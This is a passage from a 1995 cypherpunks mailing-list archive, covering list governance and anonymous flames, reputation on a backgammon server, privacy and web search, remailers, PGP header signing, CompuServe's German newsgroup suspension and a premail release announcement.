Blackwell's "worst dressed" list or "best haircuts" or whatever else). the immediate objection I can see is that all kinds of people such as PM will rant that there is no "official" cpunk privacy standard. great!! I propose somebody create their OWN and call it that without any reservations. if the cpunk name is not copyrighted, if no one owns it, then anyone can do whatever they want with it!!! ah, that's glorious anarchy for sure. if multiple standards emerge, I'm sure one will tend to become dominant, or at least the competition between them will have them covering different areas (such as FAQs in newsgroups work). this idea really has FANTASTIC protential imho. in fact I propose that Community Connection is in a really excellent position to latch onto this idea-- they already have many press releases and the industry is watching them. notice that this sticker could be used to handle the key escrow issues as well-- like one of the levels being that the company is ideologically opposed to mandatory key escrow or something. different levels of cryptography could be involved. someone will have to experiment with perhaps multiple logos and different grades. remember, the thing should be as absolutely obvious and easy to comprehend as possible for even Joe Sixpack to get it. let's create a cpunk "approval" rating that has as much recognition some day as the "intel inside" ad campaign has generated!!! From nobody at REPLAY.COM Thu Dec 28 00:50:35 1995 From: nobody at REPLAY.COM (Anonymous) Date: Thu, 28 Dec 1995 16:50:35 +0800 Subject: [NOISE] Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE Message-ID: <199512272040.VAA17079@utopia.hacktic.nl> [ More non-crypto garbage deleted ] > > God, you are annoying Fred, ER, I meant, "Alice". > My dearest Perry. > I am not Fred. I am not he. He is not me. Got it?? We aren't even in > the same category or the same country. Fred's an American, and I am not. But you do have much in common. Perry did not say that you are Fred, but instead implied he mixed the two of you up (quite understandable). > Scary, isn't it?? A non-American ... What's scary is a non-American foaming at the mouth about American politics when I'm sure his own country is far from perfect. P.S. This post is in the public domain. G. E. T. A. F. U. C. K. I. N. G. C. L. U. E. From vznuri at netcom.com Thu Dec 28 01:11:16 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Thu, 28 Dec 1995 17:11:16 +0800 Subject: another anonymous poster helping to destroy our rights In-Reply-To: <199512271725.MAA00248@jafar.sware.com> Message-ID: <199512272022.MAA25782@netcom17.netcom.com> > >As Tim May has explained over and over again, "the cypherpunks" do not >exist. Cypherpunks is a mailing list, not a society or club. >"The cypherpunks" as a group can do nothing about what gets posted to >this list except comment on it. there are various myths here that ought to be addressed. - if the cypherpunks are not really a group, then people wouldn't get upset what goes under the cypherpunk name. but in fact people flame hotly what others think is or is not a "legitimate" cypherpunk tactic or project or whatever. you can't have it both ways. either anyone is free to decide what a cypherpunk is, and no one has the right to argue with it. or, cypherpunks are something in particular, and someone has the authority to determine that. so far the "authorities" are those who have been on a the list a long time. (it is still an informal system however). this is a reasonable system. but I object to the way that people such as PM argue in one message that "there is no such thing as the cypherpunks" but then endlessly determine themselves what is appropriate for the list. doesn't anyone see the inconsistency-at-best-and-hypocrisy-at-worst of this? - its simply not true that no one can do anything about what is posted here. there are different ways of running a mailing list. here are some things that would be different than what is going on right now. I'm not saying they are better, but just remember there are alternatives: = moderator keeps a higher profile, posts under his own name, keeps order, determines apropriateness = no one argues with moderator or each other about valid topics = list can bar people who are not subscribed from posting. this would in fact bar "hit and run" anonymous messages. however obviously the current list adminstration favors them. = the list charter can ask for people to submit to various practices on the honor system, such as not using pseudonyms. cryptoanarchists who hate the idea of trust are of course going to object to the honor system, because "that which cannot be enforced should not be prohibited". >Finally, it should be noted that the kind of messages you're posting >lately are eerily reminiscent of Detweiler's mental deterioration just >before he went off the deep end. In fact, the line "How long will the >cypherpunks put up with this?" may be an exact quote. perhaps Detweiler is in fact really a pseudonym of Cohen. or maybe Cohen and Detweiler and all other anonymous posts are really a big joke being played on everyone by TCM. although you may have an interesting point there. perhaps thinking about trying to impose order on cryptoanarchists (who themselves occasionally rant about the disorder amongst themselves, although never in those terms) is a sure recipe for frustration insanity. caveat emptor!! (the list, as it is currently set up, is highly vulnerable to agents provacateur. crpytoanarchists should realize that the same "disorders" (oh, sorry, "freedoms") such as completely unrestrained anonymous posting, no "official" moderation etc. they favor can be used very effectively against them when an intelligent an mischievous adversary so chooses or is provoked to do so. there have been visceral demonstrations of this on occasion here ) From nobody at REPLAY.COM Thu Dec 28 01:54:28 1995 From: nobody at REPLAY.COM (Anonymous) Date: Thu, 28 Dec 1995 17:54:28 +0800 Subject: [NOISE] Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE Message-ID: <199512272034.PAA04934@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- [ More non-crypto garbage deleted ] > > God, you are annoying Fred, ER, I meant, "Alice". > My dearest Perry. > I am not Fred. I am not he. He is not me. Got it?? We aren't even in > the same category or the same country. Fred's an American, and I am not. But you do have much in common. Perry did not say that you are Fred, but instead implied he mixed the two of you up (quite understandable). > Scary, isn't it?? A non-American ... What's scary is a non-American foaming at the mouth about American politics when I'm sure his own country is far from perfect. P.S. This post is in the public domain. G. E. T. A. F. U. C. K. I. N. G. C. L. U. E. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMOGt6yoZzwIn1bdtAQHvtwGAyZvsHKR64N1cPI6R95HiyMfuSuATVQNP BeXflQ0LGAhRHeXH9V8TUO79RBTe0y80 =m+al -----END PGP SIGNATURE----- From ses at tipper.oit.unc.edu Thu Dec 28 02:28:00 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Thu, 28 Dec 1995 18:28:00 +0800 Subject: DejaNews and Alta Vista Search Tools, and Privacy Implications In-Reply-To: Message-ID: [Re: regulating dossiers et. al.] I'm sure that Phil Hallam-Baker has brought this up before, but there is a fair body of law on this subject internationaly. Probably the most restrictive is the UK Data Protection Act which regulates storage of personal information on computers (but not on paper). The DPA has a lot of holes, and seems to be honoured more in the breach than in the observance; other european countries have similar requirements. Of course, the UK has no FOIA, and won't until after the next election, so the most interesting databases aren't available. Simon ----- (defun modexpt (x y n) "computes (x^y) mod n" (cond ((= y 0) 1) ((= y 1) (mod x n)) ((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n)) (t (mod (* x (modexpt x (1- y) n)) n)))) From alanh at infi.net Thu Dec 28 02:45:08 1995 From: alanh at infi.net (Alan Horowitz) Date: Thu, 28 Dec 1995 18:45:08 +0800 Subject: Fwd: Re: Fwd: Re: FH radios [Dave Emery] [Vaughan Pratt] In-Reply-To: <9512270551.AA23874@pig.die.com> Message-ID: > That is not what Mr Shannon says, Shannon's law relates date That's Dr Shannon to you, kid..... From lwp at conch.aa.msen.com Thu Dec 28 02:45:32 1995 From: lwp at conch.aa.msen.com (Lou Poppler) Date: Thu, 28 Dec 1995 18:45:32 +0800 Subject: Reputation capital: FIBS case study Message-ID: <2sY4wMz2BcRC083yn@mail.msen.com> I am currently engaging in a reputation adjustment of a certain player on FIBS, the First Internet Backgammon Server (see my homepage). Reputation is important on FIBS, and I thought it might be informative to examine the ways it can work in the [more-or-less] real world. FIBS allows various levels of nymity, and various modes of reputation. Each player picks a pseudonym as his FIBS name. These can range from the crypticly anonymous nym, to some variant of the player's real name. The server will also disclose the FQDN from which the nym is connected, or was most recently connected. If she wants, the player may include any information, typically such as an email address, in an "address" field in her player profile. Or something cute, or nothing. Players may also choose to have a web page listed under their nym, on a page full of such listings. Players may participate in the newsgroup (rec.games.backgammon), identifying themselves in their posts by any or all or none of {their FIBS nym, their real name, their email address}. Reputation has several components on FIBS. Of course, personal experience with another nym is hugely significant, when it exists. When that is absent, or not conclusive, there are other sources of reputation which may be consulted. The server reports two numbers for each player, representing distinct reputation criteria: the "rating" is a weighted score representing the won/less record; the "experience" is a count representing how many games this player has played. Before I mention other reputation indices, I want to amplify on these two. When negotiating with another player about possibly starting a new match, and about the length in points of the potential match, most players will think about various aspects of the reputation of the prospective opponent. Depending on the circumstances, the difference in ratings may be decisive, in straightforward ways, for evaluating an invitation. Of particular relevance to past discussion on cypherpunks, the experience number is usually very important also. Those with a high experience level, and perhaps a name that you recall having seen before, are trusted more than nyms with little investment in their reputations. Experience matters a lot, because one of the key strategies is to avoid becoming involved with unpleasant or dishonest players. If someone has a huge experience number, you can be fairly sure that you would have heard about it if they are somehow undesirable. As FIBS is an open server, operating without charge to the users, we get a wide variety of newcomers every day. Some persist, and become better known, and others lose interest and don't return. Most are [more-or-less] agreeable and [more-or-less] ethical; however some nyms will exhibit certain recurring problem behaviors, and quickly begin to accrue negative reputation. On common problem is the use of profanity or the advocacy of various forms of bigotry, in "shout"ed comments or private messages, and the closely related hounding of players with female-sounding nyms by unwanted come-ons. This behavior is generally countered with "shout"ed and "tell"ed replies, and with the "gag " command which kills your copy of any further remarks from that user. The negative reputation resulting from this behavior is pretty much instantaneous and self-documenting, with reinforcement from anyone who is enraged enough to remember and to heckle the offender at a later login. Some of us are more sensitive about this than others, so the offensiveness is just another variable in reputation, not always the decisive one. The thorniest problem in our reputation economy continues to be the case of the player who drops out of a match when clearly losing, to avoid the decrement of his rating number (based on match results only, not on individual games). Such players follow a strategy of playing winning matches to completion, which increases their rating, but bailing out of losing matches before they end. When a match is interrupted, the server remembers it, and the two players can resume later, by mutual agreement. Almost all players are ethical enough to resume even losing matches, and eventually to complete them. The problem folks are the ones who ignore or refuse requests to resume. Avoiding such players is a key strategy for serious FIBS regulars. One indicator here can be a complex function of the rating and experience numbers: a player with fairly low experience but an unexpectedly high rating is one of two things -- either a very strong player, or else a match dropper. (Or else very lucky, but we prefer to think of that as strength of play.) The best defense we have found against the match dropper is complaining in the newsgroup. I just posted a warning in the newsgroup about a new match dropper which I had the misfortune of playing against. I accepted an invitation from him last Saturday, to play a 3 point match. I looked over his info before I accepted, and decided to give him a chance: no email address, experience = 57, and rating showing slightly more wins than losses, from a site at a college in Britain. I won the first game for 2 points, and was pretty clearly winning the next game, which would make me win the match. When "dorion" rolled a game-losing double five, he immediately dropped his connection to FIBS. The server saved the match, and I waited around for awhile to see if he would come back. He didn't. Now at this point, I'm not yet ready to start in on his reputation. After all, we all have host problems, and phone problems, and personal problems. It's still possible that he and I will meet later, and finish the match. (I'm skeptical, because the timing of it is just too convenient, but I hold my tongue). Finally Tuesday, I was hanging on FIBS when dorion returned. I asked politely if we could finish, but dorion immediately logged out without replying. I stayed connected to FIBS, while I did some other work on other VC-s. Before long, dorion was back, my little watchdog macro beeped for me, and I again politely asked him to resume. Instead of replying, he started a fresh match vs. a brand new player, experience equal zero. I started watching their match, where I asked again if we could resume sometime. While I wasn't getting an answer, I looked into the new player's information: connected from exactly the same site as dorion! This of course, is a warning sign of the other common form of ratings cheating -- creating two nyms for one person, and playing against oneself, with one nym always winning and the other always losing. Well, again I got no reply to my requests, and both nyms suddenly disconnected without finishing their match. At this point, I set about trashing dorion's reputation. I posted a (PGP signed) article to the newsgroup setting forth the facts. When I came back on today, there was one followup from another player who had a similar experience with dorion. When I signed onto FIBS, I got a "tell" from a trusted, veteran nym saying that dorion and his alter-ego nym BatesMotel had just been on, and played a couple of one-sided and not at all credible matches vs. each other. I checked their ratings/experience and followed up to my own article with a definite advisory against playing against either nym. Now, despite many elaborate proposals over the years, discussed at length in the newsgroup, there is no automated mechanism for dealing with this sort of negative reputation. I have a personal "don't-play" list I keep up to date, as do many others. My complaint surely got dorion and BatesMotel into many such personal lists, and neither nym is likely to last on FIBS. I'm not really asking for suggestions here or anything. It's likely that most of them have already been debated to death on r.g.b. I just wanted to show you a case of reputation markets in action. :::::::::::::::::::::::::::::::::::::: Thank you VERY much! You'll be :: Lou Poppler :: getting a Handsome Simulfax Copy :: http://www.msen.com/~lwp/ :: of your OWN words in the mail :::::::::::::::::::::::::::::::::::::: soon (and My Reply). From stewarts at ix.netcom.com Thu Dec 28 02:47:32 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 28 Dec 1995 18:47:32 +0800 Subject: DejaNews and Alta Vista Search Tools, and Privacy Implications Message-ID: <199512272027.MAA18633@ix12.ix.netcom.com> At 03:28 AM 12/27/95 -0800, tcmay at got.net (Timothy C. May) wrote: >Anyway, a point of clarification of a point, lest there be the belief that >_all_ Cypherpunks are opposed to comprehensive Web search tools: ...... ...offshore... ...... >Face it, every single word written by any of us to any Usenet newsgroup, >going back to the beginning of Usenet, and expanding out to many >ostensibly-private mailing lists, will fairly soon be searchable. The Internet not only makes it easier for everybody to get their 15 minutes of fame, it guarantees that anything stupid you've said in public over the last 15 years will be available to the entire world. So deal with it... I'm more bothered by people indexing what I read. What kinds of Cypherpunk technology can we use to affect this? I don't think we need to do too much work on _increasing_ data collection; the commercial markets will figure that one out fast enough, though understanding technical possibilities enough to stay ahead is good. Remailers and nymservers are obvious starts on the information-hiding end, and even the basic non-encrypted cypherpunks remailers are good enough for most applications. The problem is getting them widely deployed. I've seen a couple of web-page-based remailers, and they're probably easy to deploy widely; they're not very secure without SSL, but they're a start, and people on SSL-equipped systems can run them securely. Anon web proxies are more work to deploy, but they're not mysterious, and the main limits to deploying them are economics. Nymservers, however, are still pretty new - technology like anon.penet.fi is generally good enough for most people if you've got an operator you trust, and an economic base that makes it worth running them. But the more secure nymservers are still complex, and probably not something the average hacker can just pop up and run - we probably need to explore them more before it'll be easy to do. While I like getting services provided through community spirit, like most of the remailers, I suspect Tim's right that pay-per-use privacy services are going to evolve, and probably dominate. Among other things, they're in the balance between the couch-potato on-line services and real Internet connections; they're probably more likely to be offered by people who want full-time connectivity, and will be used to offset the slightly higher costs of real service. However, partly due to patent issues, and partly just to convenience, I don't think they all need to use fully-anonymous digicash for every transaction; most of them can get by with service-provider tokens that may be paid for by digicash or by less-anonymous systems. One of the main threats I see to privacy services is the Exon bill - it's pretty obvious that most US service providers will have to limit access to people over 18, in spite of any of the Good Senator's claims otherwise. If the Feds start making examples of people before any serious court cases get decided (or after, if the good guys lose), that probably means that service providers will have to check ID to protect themselves. There may be a market for services that validate that their customers are over 18, but provide anonymity within that. #-- # Thanks; Bill # Bill Stewart, stewarts at ix.netcom.com, Pager/Voicemail 1-408-787-1281 # .... Heading back to The Big Phone Company From jeffb at sware.com Thu Dec 28 03:42:53 1995 From: jeffb at sware.com (Jeff Barber) Date: Thu, 28 Dec 1995 19:42:53 +0800 Subject: another anonymous poster helping to destroy our rights In-Reply-To: <199512272022.MAA25782@netcom17.netcom.com> Message-ID: <199512272229.RAA02161@jafar.sware.com> Vladimir Z. Not-Detweiler writes: > >As Tim May has explained over and over again, "the cypherpunks" do not > >exist. Cypherpunks is a mailing list, not a society or club. > >"The cypherpunks" as a group can do nothing about what gets posted to > >this list except comment on it. > > there are various myths here that ought to be addressed. > > - if the cypherpunks are not really a group, then people wouldn't get > upset what goes under the cypherpunk name. but in fact people flame > hotly what others think is or is not a "legitimate" cypherpunk tactic > or project or whatever. And flame hotly is the full extent of what can be done by "the cypherpunks". The point I'm making is that "the cypherpunks" can't do anything about anonymous posters or other such "problems". It's pretty pointless to ask the list how long "we" will "put up with" postings made by an anonymous person. There's nothing I nor any other J. Random Cypherpunk can do about it, even if I/we wanted to (which I, at least, do not). This is not at all the same issue as whether a given post is on-topic or whether a given opinion is cypherpunk-correct (not that there's much I can do about those things either). In any case, the only time most folks on this list get "upset" is when someone on the list tries to say or imply that they represent "the cypherpunks" or "the cypherpunk point of view". Of course he/she is free to do so anyway, but should expect to get "flamed hotly" if someone disagrees. [ Rest of rant also beside the point ] -- Jeff From nobody at REPLAY.COM Thu Dec 28 04:11:02 1995 From: nobody at REPLAY.COM (Anonymous) Date: Thu, 28 Dec 1995 20:11:02 +0800 Subject: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE Message-ID: <199512271950.OAA04721@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- [ Non-crypto garbage deleted ] The Vince Foster articles were more relevant than this garbage (not to mention the fact they made more sense). P.S. This post is in the public domain. G. E. T. A. F. U. C. K. I. N. G. C. L. U. E. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMOGjoCoZzwIn1bdtAQHRJwF/fATfL+ZmsLlB8wgGdme5QkXExqw8Fa0G MZuaH93wUT5B+VgTQSuWPfqfd+zaUUTo =jf8w -----END PGP SIGNATURE----- From mclow at owl.csusm.edu Thu Dec 28 04:43:23 1995 From: mclow at owl.csusm.edu (Marshall Clow) Date: Thu, 28 Dec 1995 20:43:23 +0800 Subject: Did anyone see... Message-ID: On C-Span today: 2:06 pm ET/11:06 am PT Secret Codes Used in World War II National Security Agency -- Marshall Marshall Clow Aladdin Systems "Eternal vigilance is the price of PostScript" -- MacUser Jan 96 DTP and Graphics column From usura at utopia.hacktic.nl Thu Dec 28 04:45:27 1995 From: usura at utopia.hacktic.nl (Alex de Joode) Date: Thu, 28 Dec 1995 20:45:27 +0800 Subject: COMMUNITY CONNEXION ANNOUNCES APACHE-SSL COMMERCE Message-ID: <199512271221.NAA06057@utopia.hacktic.nl> : At 01:12 PM 12/26/95 -0800, sameer wrote: : > The Apache-SSL Commerce webserver is the only commercial encrypting : > webserver with source available. Ian Goldberg, graduate student at : > U.C. Berkeley, well-known for his work on SSL security, commented on : > the importance of available source, ftp://ftp.hacktic.nl/pub/replay/pub/apache/ -AJ- From jya at pipeline.com Thu Dec 28 04:45:32 1995 From: jya at pipeline.com (John Young) Date: Thu, 28 Dec 1995 20:45:32 +0800 Subject: GEY_ser Message-ID: <199512271915.OAA21557@pipe1.nyc.pipeline.com> 12-27-95. W$Jug: A test of superfast cable modems at Boston College prove addictive to speed freak faculty and students downloading junk data in seconds not minutes and hours, thus accelerating mind-rupture. And, an editorial red flags the telecom billions giveaway; nags Republicans to shut the geyser and not-reg the I-Way. GEY_ser From ponder at wane-leon-mail.scri.fsu.edu Thu Dec 28 04:45:50 1995 From: ponder at wane-leon-mail.scri.fsu.edu (P.J. Ponder) Date: Thu, 28 Dec 1995 20:45:50 +0800 Subject: Crypto specialist wanted Message-ID: CSI's most recent _Computer Security Alert_ has a listing for: Cryptographic specialist for a San Diego based firm. Headhunter's address is: vfalcon at onramp.net (I know this is isn't jobs.misc, but traffic having been relatively light, I'm passing this on to others who may be interested in crypto, but aren't on CSI's mailing list. Now back to frequency hopping radios and Anti-Fred) From ponder at wane-leon-mail.scri.fsu.edu Thu Dec 28 04:46:11 1995 From: ponder at wane-leon-mail.scri.fsu.edu (P.J. Ponder) Date: Thu, 28 Dec 1995 20:46:11 +0800 Subject: DOS - MD5 - Thanks Message-ID: Thanks to everyone who offered help on the MD5 for DOS. Greg Broiles pointed me to the pgp source, which may do the trick. (There is MD5 module in pgp[?]) I will investigate. For everyone's info, didn't find a freestanding dos implementation, tho. My copy of Schneier didn't have the disk, so I don't know if it's there, either. -- PJP From mark at ausnetinfo.com.au Thu Dec 28 04:48:00 1995 From: mark at ausnetinfo.com.au (Mark) Date: Thu, 28 Dec 1995 20:48:00 +0800 Subject: Encrypted script - sort of In-Reply-To: Message-ID: <199512272234.JAA05530@ausnetinfo.com.au> >> >A tale I hear is that when HP had to deliver operating system source to >> >the french government they stripped all comments and changed all variable >> >and subroutine names to 32 byte strings of I 1 0 (zero) and O (uppercase O). >> >It still compiled but was 100% useless to human readers. > >A somewhat useful utility would be one that would compress C code into as >small space as possible, stripping out all spaces and making variable >names one character a piece when possible. And of course one to expand it >back into 'formatted' text, style could even be incorporated. > >I'm sure a Perl fanatic knows a quick solution... I'm always amazed at >how short Perl code is.. :) Anyone care to take care of this utility? press.c has been circulating for several years. I dont know of an unpress.c but a beautifier would do the same thing. From raph at kiwi.cs.berkeley.edu Thu Dec 28 05:02:46 1995 From: raph at kiwi.cs.berkeley.edu (Raph Levien) Date: Thu, 28 Dec 1995 21:02:46 +0800 Subject: Only accepting e-mail from known parties In-Reply-To: Message-ID: <199512280151.RAA25092@kiwi.cs.berkeley.edu> Dr. Dimitri Vulis wrote: > I suggest to the kind folks working on PGP 3 that there should be a > standard protocol to include within the signed portion the information > on when and for whom this text is written: i.e. the list of e-mail > recipients and/or Usenet newsgroups, which could be easily compared > with the RFC 822/1036 headers of an e-mail/Usenet article. Perhaps > there could be a new option for PGP to look _outside_ the signed block > and match the headers with what's inside the block. E.g., suppose the > signature block says: this text was written by alice at zog.org, posted > to alt.sex and alt.sex.banal and e-mailed to bob at masons.com. Suppose > PGP is asked to check the signature in a file that purports to be a > e-mail or a Usenet article and has some headers before the signed > portion. If there is a list of To: recipients, and it includes someone > other than the recipients listed within the signed block; or if there > is a Newsgroups: header, and it includes newsgroups not listed within > the signed portion; then the input is bogus. For compatibility with > the existing software, if the signed block doesn't include this info, > then this checking should't be done, of course. In fact, the security multiparts standard (RFC 1848) includes a provision for signing the headers as well as the body of a message. The security multiparts can be used with PGP, and there is even an Internet Draft for it (draft-elkins-pem-pgp-02.txt), but there is not yet consensus for adopting this as a standard on the pgp-mime mailing list. Perhaps your example can be used to argue one the advantages of the security multiparts approach. Raph From norm at netcom.com Thu Dec 28 05:29:25 1995 From: norm at netcom.com (Norman Hardy) Date: Thu, 28 Dec 1995 21:29:25 +0800 Subject: URL for cypherpunks Message-ID: I am putting up some solutions to the Garage Door problem that was discussed here perhaps a year ago. I would like to refer to the cypherpunks by URL. Are there currently any appropriate URLs ? From farber at central.cis.upenn.edu Thu Dec 28 05:29:50 1995 From: farber at central.cis.upenn.edu (Dave Farber) Date: Thu, 28 Dec 1995 21:29:50 +0800 Subject: German government orders censorship of CompuServe -- a sign of things to come djf Message-ID: <2.2.32.19951227235302.006bfe14@linc.cis.upenn.edu> Posted-Date: Wed, 27 Dec 1995 17:47:17 -0500 X-Sender: farber at linc.cis.upenn.edu Date: Wed, 27 Dec 1995 17:47:17 -0500 From: Dave Farber Subject: IP: German government orders censorship of CompuServe -- a sign of things to come djf To: FOR IMMEDIATE RELEASE CONTACT: William Giles Russ Robinson CompuServe Incorporated CompuServe Incorporated 614/ 538-4388 614/ 538-4274 COMPUSERVE(R) SUSPENDS ACCESS TO SPECIFIC INTERNET NEWSGROUPS COLUMBUS, Ohio, Dec. 28, 1995 -- During the past week, CompuServe Incorporated temporarily suspended access to more than 200 Internet newsgroups in response to a direct mandate from the prosecutor s office in Germany. Each of the newsgroups that was suspended was specifically identified to CompuServe by the German authorities as illegal under German criminal law. CompuServe did not select any groups or determine the nature of the newsgroups that have been impacted by this action. German government officials, as part of an investigation of illegal material on the Internet, ordered CompuServe to do what was necessary with respect to specified newsgroups in order to comply with German law. German authorities are investigating newsgroups and other Internet content that may contain child pornography, other pornographic material illegal for adults, as well as content that although not illegal for adults is of such an explicit nature that it is illegal for minors. While access has been suspended, CompuServe continues to work with German authorities to resolve this matter. CompuServe cannot alter the content on the Internet in any way and has only suspended access to the disputed newsgroups through CIS. The issues being investigated in Germany, like those being addressed across the industry, need to remain focused on the individuals and groups placing content on the Internet. CompuServe, as an access provider, is not responsible for the origination or nature of content on the Internet over which it has no creative or editorial control. The global market is vital to CompuServe. We currently have 500,000 members in Western Europe and anticipate doubling that number in the next year. As the leading global service, CompuServe must comply with the laws of the many countries in which we operate. However, laws in different countries are often in conflict, and this creates new challenges unique to the emerging online industry. CompuServe is investigating ways in which we can restrict user access to selected newsgroups by geographical location. > From tallpaul at pipeline.com Thu Dec 28 05:36:28 1995 From: tallpaul at pipeline.com (tallpaul) Date: Thu, 28 Dec 1995 21:36:28 +0800 Subject: Only accepting e-mail from known parties Message-ID: <199512280241.VAA19432@pipe10.nyc.pipeline.com> [Below is the original I failed to post to the group as a whole. Sorry about the temporal confusion that produced.] On Dec 25, 1995 14:53:19, 'Adam Shostack ' wrote: > The basic problem is that (personal) spam is a social, not a >technical problem. If someone wants to annoy you via the internet, >they can do so. You can raise the cost of their annoying you, but you >need to be careful not to make it difficult to talk to you. > I agree in many ways. On a personal level, I am far more interested in the *social* are of this form of privacy. It is more a problem of the data-hermit than privacy. And in a society increasingly generating narcissistists, I see the problem getting worse. Negroponte of the MIT Media Lab can sing the praises of the personal e-newspaper with personal filters to cut out everything uninteresting while culling the world new feeds for desired information. I see this feeding into the narcissitism problem. E.G. Imagine two people who "feel" that members of the other gender are "only interested in one thing." Each wakes up in the morning and looks at their personal e-paper. She reads nothing of particularly nasty rapes, serial rapists at large, rapists who have been convicted, and rapists who an uncaring pro-male system has let out to rape again (i.e. been found not guilty). He reads nothing of particularly nasty robberies of men by women, serial robberies by prostitutes, female robbers who have been convicted, and robbers who an uncaring pro-female system has let out to rob again. Both believe that their custom filtered feeds are the *real* events going on in the world and are far more accurate than any non-customized news feed. I hope nobody takes this as a generic attack on the privacy issues that the list is devoted to. I am a great supporter of privacy and pro-privacy tek. But I see myself as a realist on privacy issues, not as a privacy-utopian or a privacy-dystopian. We live in a post-Faustian world. It is divided into two groups of people. First are those who understand the post-Faustian character and devote themselves to getting used to it and even having fun with the new opportunities while understanding that the new world also generates new problems (like furthering data-narcicism). Second are those classic-reactionary forces (from all parts of the political spectrum) who whine about how the post-Faustian world is personally unfair to them and how everybody in the world has a personal obligation to them to move the world back to its pre-Faustian origins. --tallpaul PS to Tim May: I understand your posts on material that is off-topic. I usually agree with your posts. But I see the issues I discussed above as far more on topic (even if highly mediated) than, say, the ongoing discourse on the differences between an Army Captain and a Navy Captain. From tcmay at got.net Thu Dec 28 05:39:32 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 28 Dec 1995 21:39:32 +0800 Subject: another anonymous poster helping to destroy our rights Message-ID: At 5:25 PM 12/27/95, Jeff Barber wrote: >Fred Cohen writes: >> >> We just heard from another anonymous poster trying to destroy our rights >> to free speech. How long will the cypherpunks put up with this? > >As Tim May has explained over and over again, "the cypherpunks" do not >exist. Cypherpunks is a mailing list, not a society or club. >"The cypherpunks" as a group can do nothing about what gets posted to >this list except comment on it. Precisely. Some of the many advantages of having no centralized structure/leadership, and no formal rules/policies, are: -- less wrangling over leadership and rules (if you think we wrangle and fight too much, look at organizations that spend *all* of their time choosing leaders, having boardroom fights, setting policies, fighting, electioneering, etc...it makes our easily-filtered flame wars pale by comparison) -- no leaders means no one in a position of leadership to sue for the many "infractions" some of our list members commit (violations of export laws, posting of stolen code, libel, etc., all allegedly, of course) -- no centralized focus, save for the toad.com machine, which could be replaced quickly (or cypherpunks could become "alt.cypherpunks" and then truly have no center, not that I am advocating this, for various reasons). This lack of a point of pressure, a center, means opponents have nothing to jab at...they can't write threatening letters to the "Board of Directors" demanding that certain actions cease, etc. >Finally, it should be noted that the kind of messages you're posting >lately are eerily reminiscent of Detweiler's mental deterioration just >before he went off the deep end. In fact, the line "How long will the >cypherpunks put up with this?" may be an exact quote. Indeed. When I saw this "How long will the Cypherpunks put up with this?" I initially thought it was tongue in cheek. Apparently not. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From raph at c2.org Thu Dec 28 06:18:23 1995 From: raph at c2.org (Raph Levien) Date: Thu, 28 Dec 1995 22:18:23 +0800 Subject: Announcing a new alpha release of premail Message-ID: <199512280524.VAA09252@infinity.c2.org> This is to announce that premail version 0.42 is now available. It is a full alpha version of the new premail, containing all the features and functions planned for the production release. Features include: * Support for all cypherpunk remailers. * Support for Mixmaster remailers. * Encrypted and signed email, including both preparation and decoding. * Support for the emerging PGP/MIME standard. * Support for MOSS through TIS/MOSS 7.1. * Creation and management of alpha.c2.org style nyms. * More secure handling of sensitive "secrets". * Much improved automatic selection of remailer chains. * Clean handling of "cc:" field and other such interactions. * Numerous other features. For more information about premail, see the premail Web page at: http://www.c2.org/~raph/premail.html If you are in the US or Canada, you can download premail now, from the premail Distribution Authorization Form: http://kiwi.cs.berkeley.edu/premail-form.html Please forward bug reports, comments, and suggestions to me, so that the beta release can be as solid as possible. Raph Levien From futplex at pseudonym.com Thu Dec 28 06:23:43 1995 From: futplex at pseudonym.com (Futplex) Date: Thu, 28 Dec 1995 22:23:43 +0800 Subject: Telcom bill report In-Reply-To: <01HZBAWIUN7C8Y55DD@mbcl.rutgers.edu> Message-ID: <199512280621.BAA27713@opine.cs.umass.edu> E. ALLEN SMITH writes: > >> Here's the additional info from Reuters. As usual, Clinton is being a > > coward. > > How do you figure ? > > > Vice President Gore says President Clinton will sign the bill. Before > > the agreement, the president had been threatening for months to veto > > the bill if Republicans in Congress did not retreat on a long list of > ~~~~~~~~~~~ > > issues. They retreated. > ~~~~~~~~~~~~~~ > > Clinton won on this. The Administration does not appear to have altered its > position on this substantially. > ---------- > I am calling Clinton a coward for giving in to the Christian Coalition > and not vetoing this bill due to the censorship portion. He evidently decided > that following his oath of office and upholding the First Amendment wasn't > worth the "porn supporter" criticism Ralph Reed and his lot would direct his > way. Thanks ever so much for posting my non-list-relevant private mail to the list. -Futplex From tcmay at got.net Thu Dec 28 06:26:48 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 28 Dec 1995 22:26:48 +0800 Subject: Employer Probing Precedents? Message-ID: At 9:51 PM 12/27/95, "Jason D. Livingood/WSC"@hks.net wrote: >To Whom It May Concern: > >I was curious as to where I might find some electronic freedom legal >precedents. If, for example, an employer was planning to probe file >systems on >PCs in the off-hours and employees began encrypting their hard drives, what >legal precedents would support the employees or would support the employer in >blocking the encryption? Think of it another way. I have a PC which is for the use of my employee. It is my computer. I am his employer. He runs the programs I authorize him to, or at least I trust him to run programs needed to do his job and not use my computer to run a numbers racket or to manage his drug business. Thus, I reserve the right to inspect my own computer as I wish. He is free to accept this condition, or of course to leave. There can be no valid or reasonable law which says that my computer, which he uses, is no longer accessible to me because his "electronic privacy" takes precedence over my property rights. Nor any valid or reasonable law which says I cannot restrict what encryption programs he 